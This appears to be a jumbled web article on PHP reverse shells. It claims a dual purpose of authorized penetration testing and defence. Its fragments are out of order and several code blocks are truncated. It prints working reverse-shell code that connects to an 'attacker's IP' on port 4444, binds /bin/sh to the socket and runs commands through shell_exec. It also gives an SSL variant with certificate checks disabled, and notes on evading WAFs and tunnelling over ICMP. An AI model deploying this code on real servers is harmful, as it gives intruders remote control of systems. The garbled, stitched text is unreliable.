// Spawn a shell process $descriptorspec = [ 0 => $sock, // stdin 1 => $sock, // stdout 2 => $sock // stderr ];
// Execute /bin/sh (Unix) or cmd.exe (Windows) $process = proc_open('/bin/sh', $descriptorspec, $pipes);
<?php // Attacker's IP and listening port $ip = '192.168.1.100'; $port = 4444; // Create a TCP socket $sock = fsockopen($ip, $port, $errno, $errstr, 30); Reverse Shell Php
Introduction In the world of cybersecurity, few terms evoke as much tension as "Reverse Shell." For penetration testers (ethical hackers), it is a golden standard for gaining control over a remote server. For malicious actors, it is a primary tool for persistence and lateral movement. When you combine this technique with the world's most popular server-side scripting language—PHP—you get a potent, flexible, and often hard-to-detect backdoor.
// Try every command execution method if (function_exists('shell_exec')) while ($cmd = fgets($sock)) fwrite($sock, shell_exec($cmd) . "\n"); // Spawn a shell process $descriptorspec = [
while (true) $cmd = fgets($sock); if ($cmd) $output = shell_exec($cmd); fwrite($sock, $output); sleep(2); // Polite interrupt
$context = stream_context_create(['ssl' => ['verify_peer' => false]]); $sock = stream_socket_client('ssl://192.168.1.100:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context); Some networks block arbitrary TCP ports but allow ICMP (ping). An advanced reverse shell can encode commands in ICMP packets using tools like icmpsh or custom PHP scripts. 3. Short Obfuscation (Bypassing <?php detection) Some WAFs block scripts starting with <?php . Attackers use tags like <?= (short echo) or JavaScript-like obfuscation: how it works
This article serves a dual purpose. First, we will explore what a PHP reverse shell is, how it works, and provide technical examples for authorized security testing. Second, and more importantly, we will arm system administrators and developers with the knowledge to detect, prevent, and defend against these attacks.